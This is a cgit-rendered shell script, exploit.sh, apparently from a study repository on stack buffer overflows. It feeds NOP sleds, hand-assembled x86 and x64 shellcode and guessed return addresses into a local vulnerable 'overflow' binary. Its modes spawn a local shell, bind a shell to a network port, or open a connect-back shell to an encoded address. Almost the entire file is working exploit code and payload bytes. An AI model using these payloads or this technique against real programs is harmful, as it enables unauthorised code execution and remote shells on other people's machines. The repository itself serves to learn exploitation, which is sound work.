aboutsummaryrefslogtreecommitdiff
path: root/exploit.sh
blob: 643fa502f6b370027ab4bc33c8a01aac9257936d (plain) 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100

#!/bin/sh

# generate shellcode with metasploit (exec /bin/sh):
#   ./msfpayload linux/x86/exec cmd=/bin/sh R | ./msfencode -b '\x00\x09\x0a\x0d\x1b\x20'
# uses (currently) only self-written shellcode ..


DIR="$(dirname $0)"

find_return_adr32() {
	if [ -z "$1" -o -z "$2" -o -z "$3" ]; then
		return 1
	fi
	ret=$(gdb -batch -x "${DIR}/dump32.gdb" --args $1 $2)
	adr=$(echo "${ret}" | sed -n 's/\(.*\):\s\+0x90909090\s\+0x90909090\s\+0x90909090\s\+0x90909090/\1/p' | sort)
	if [ $? -ne 0 ]; then
		echo "$0: no adr found: ${adr}"
		return 1
	fi
	chs=$(echo ${adr} | cut -d ' ' -f $3)
	if [ $? -ne 0 ]; then
		echo "$0: check adr index: $3"
		return 1
	fi
	echo $(echo "${chs}" | sed 's/0x\(.\{2\}\)\(.\{2\}\)\(.\{2\}\)\(.\{2\}\)/\\x\4\\x\3\\x\2\\x\1/')
	return 0
}

find_return_adr64() {
	if [ -z "$1" -o -z "$2" -o -z "$3" ]; then
		return 1
	fi
	ret=$(gdb -batch -x "${DIR}/dump64.gdb" --args $1 $2)
	adr=$(echo "${ret}" | sed -n 's/\(.*\):\s\+0x90909090\s\+0x90909090\s\+0x90909090\s\+0x90909090/\1/p' | sort)
	if [ $? -ne 0 ]; then
		echo "$0: no adr found: ${adr}"
		return 1
	fi
	chs=$(echo ${adr} | cut -d ' ' -f $3)
	if [ $? -ne 0 ]; then
		echo "$0: check adr index: $3"
		return 1
	fi
python2.7 - <<EOF
import struct, binascii
print repr(struct.pack('<Q', int('$chs',16)))[1:33]
EOF
        return 0
}

if [ ! -f "${DIR}/overflow" -o ! -f "${DIR}/overflow_x64" ]; then
	echo "$0: run make first!"
	exit 1
fi

RETURN_ADR_OVERFLOW32=$(find_return_adr32 "${DIR}/overflow" "$(python2.7 -c 'print "\x90"*117 + "\x31\xc0\x31\xdb\x31\xc9\x99\xeb\x08\x5b\x88\x43\x07\xb0\x0b\xcd\x80\xe8\xf3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x90"*154')" 3)
RETURN_ADR_OVERFLOW64=$(find_return_adr64 "${DIR}/overflow_x64" "$(python2.7 -c 'print "\x90"*133 + "\xeb\x13\x48\x31\xc0\x5f\x88\x47\x07\x57\x48\x89\xe6\x50\x48\x89\xe2\xb0\x3b\x0f\x05\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\xff" + "\x90"*153 + ""')" 3)


if [ -z "$1" ]; then
	echo "$0 [local32|local64|bind32|bind64|connect32]"
	exit 1
fi

if [ "$1" = "local32" ]; then

	# NOPsled(158) + shellcode(70) + NOPsled(117) + return_addr(4)
	# uses own shellcode: shellcode/hello.asm (x86-nasm)
	echo "$0: using return adr: ${RETURN_ADR_OVERFLOW32}"
	gdb -ex r --args ./overflow $(python2.7 -c 'print "\x90"*158 + "\x31\xc0\x31\xdb\x31\xc9\x99\xeb\x08\x5b\x88\x43\x07\xb0\x0b\xcd\x80\xe8\xf3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x90"*117 +"'${RETURN_ADR_OVERFLOW32}'"')

elif [ "$1" = "local64" ]; then

	# NOPsled(133) + shellcode(34) + NOPsled(145) + return_addr(8)
	# uses own shellcode: shellcode/execve_x64.o
	echo "$0: using return adr: ${RETURN_ADR_OVERFLOW64}"
	gdb -ex r --args ./overflow_x64 $(python2.7 -c 'print "\x90"*133 + "\xeb\x13\x48\x31\xc0\x5f\x88\x47\x07\x57\x48\x89\xe6\x50\x48\x89\xe2\xb0\x3b\x0f\x05\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\xff" + "\x90"*145 + "'${RETURN_ADR_OVERFLOW64}'"')

elif [ "$1" = "bind32" ]; then

	# 85xNOP + shellcode(134) + 85xNOP + return addr
	# uses own shellcode: shellcode/socket.asm (x86-nasm)
	./overflow `python2.7 -c 'print "\x90"*85 + "\x31\xc0\x31\xdb\x50\xb3\x01\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x50\x66\x68\xaa\x11\x66\x6a\x02\x89\xe1\x6a\x10\x51\x52\x89\xe1\x31\xdb\xb3\x02\xb0\x66\xcd\x80\x31\xc0\x50\x52\x89\xe1\xb0\x66\x31\xdb\xb3\x04\xcd\x80\x31\xc0\x50\x66\x50\x66\x6a\x02\x89\xe1\x6a\x10\x54\x51\x52\x89\xe1\x31\xdb\xb3\x05\xb0\x66\xcd\x80\x31\xc9\xb1\x03\x89\xc3\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\xfe\xc1\xe2\xf4\x31\xc0\x31\xc9\x99\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x88\x44\x24\x08\xb0\x0b\xcd\x80\xb0\x01\x31\xdb\xb3\x42\xcd\x80" + "\x90"*85 + "\xc4\xf2\xff\xbf"'`

elif [ "$1" = "bind64" ]; then

	# 100xNOP + shellcode(149) + 63xNOP + return addr
	# uses own shellcode: shellcode/socket_x64.asm (x64-nasm)
	./overflow_x64 `python2.7 -c 'print "\x90"*100 + "\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x40\xb7\x02\x40\xb6\x01\xb0\x29\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\x66\x68\xaa\x11\x66\x6a\x02\x48\x89\xe6\xb2\x10\xb0\x31\x0f\x05\x48\x31\xc0\x48\x31\xf6\xb0\x32\x0f\x05\x48\x31\xc0\x50\x66\x68\xaa\x11\x66\x6a\x02\x48\x89\xe6\x6a\x10\x48\x89\xe2\xb0\x2b\x0f\x05\x48\x89\xc7\x48\x31\xd2\xb2\x03\x48\x89\xd6\x48\xff\xce\x48\x31\xc0\xb0\x21\x0f\x05\xfe\xca\x75\xef\x48\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x50\x48\x31\xc0\x88\x44\x24\x08\x48\x89\xe7\x50\x48\x89\xe6\x50\x48\x89\xe2\xb0\x3b\x0f\x05\x48\x31\xc0\x48\x31\xff\x40\xb7\x42\xb0\x3c\x0f\x05"  + "\x90"*63 + "\x02\xe7\xff\xff\xff\x7f"'`

elif [ "$1" = "connect32" ]; then

	# 97 bytes NOP + 110 bytes shellcode + 97 bytes NOP + return addr
	# uses own shellcode: shellcode/connect.asm (x86-nasm)
	./overflow `python2.7 -c 'print "\x90"*97 + "\x31\xc0\x31\xdb\x50\xb3\x01\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x68\x6e\x11\x11\x10\x81\x34\x24\x11\x11\x11\x11\x66\x68\x14\x28\x66\x81\x34\x24\x11\x11\x66\x6a\x02\x89\xe1\x6a\x10\x51\x52\x89\xe1\xb3\x03\xb0\x66\xcd\x80\x31\xc9\xb1\x03\x89\xd3\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\xfe\xc1\xe2\xf4\x31\xc0\x31\xc9\x99\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x88\x44\x24\x08\xb0\x0b\xcd\x80\xb0\x01\x31\xdb\xb3\x42\xcd\x80" +"\x90"*97 + "\xc4\xf2\xff\xbf"'`

else
	$0
fi
Powered by cgit, Themed by Ted Yin.